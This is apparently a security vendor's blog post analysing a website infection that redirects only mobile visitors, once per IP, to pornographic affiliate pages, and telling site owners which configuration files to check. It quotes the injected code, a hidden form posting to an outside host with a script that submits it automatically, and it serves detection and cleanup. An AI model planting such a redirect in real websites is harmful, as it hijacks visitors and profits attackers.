The past week has brought about a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections had a similar pattern where they only targeted mobile devices. They are highly conditional as well making it challenging for webmasters to detect.
Lets take a minute to explain what is going on.
Conditional Redirects to Porn Websites Targeting Mobile Devices
Sounds complicated, but it isn’t. If the visitor is coming from an Ipad, Iphone, Android or other similar mobile device, the page is redirected to a random pornographic page. If the same person tries to visit the site again, nothing happens and the site loads properly. What gives?
1. The Word is “Conditional”
The malware injected on the website is intelligent. It stores the IP address for all the visitors that it redirects to the porn website. If you see the redirect once, it is likely that you won’t see it again for many hours. This makes the malware very difficult to detect and leads people to think it was a random error or that maybe they mistyped the URL.
This injection is only redirecting Mobile browsers. It’s targets seems to be iPhone, iPad, Android and a few other mobile OS browsers. For everyone else, the site looks clean and safe.
3. Mobile-only + Conditional = Very hard to detect
When you mix conditional with mobile-specific infections, you know it will be very difficult to detect. Yes, even SiteCheck has a hard time flagging it. It will flag the site once, but if the user forces a re-scan it will show the website as clean.
As you can imagine, it can be very confusing for the end user.
Rafael Capovilla, one of our Sr. Analysts, was the first to find and decipher how the injection is displayed on the browser. It is very sneaky, accomplishing it’s goal by utilizing a form like this one:
<form method=POST action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725..” id=”refoto_form” target=”_top”>
document.getElementById("refoto_form"). submit( );
This forces the POST to be submitted and the visitor redirected. At first glance they both look legitimate and will likely pass as clean for most (if not all) Anti-Virus and security tools.
As mentioned before, this only appears on Mobile devices and conditionally. You might be wondering why they would redirect to porn. As is often the case, it’s all about the money.
These pages are the first level in the redirection funnel. They proceed to push the user to affiliate/ads links, similar to these: httx://ads. mobiteasy.com/ or httx://www. instabang.com/tour/zinstabang.
Where they pay the malware authors good money for every click.
Removing the Porn Redirection
Shameless Plug: If you have used SiteCheck and notice the issue I mentioned above – showing dirty then clean or not showing at all – have no fear, this does happen from time to time it’s how the scanner works. Rest assured though that our team is able to address the issue and our internal scanners will catch the issue outright once configured.
To address the issue yourself investigate these locations:
- /wp-config.php (if using WordPRess)
- /configuration.php (if using Joomla)
- /wp-content/themes/yourtheme/functions.php (if using WordPress)
These are the 4 places we see this injection being added. Note that it is highly encoded, you will have to look for any line that looks out of place and it’s best to engage your developer for help.
Remember, the issue at the surface – the infection – is only the tip of the iceberg. If your website is infected you have to assume that the attackers have penetrated your defenses and have added controls that will allow them to continue to penetrate your environment. Be sure to look for backdoors.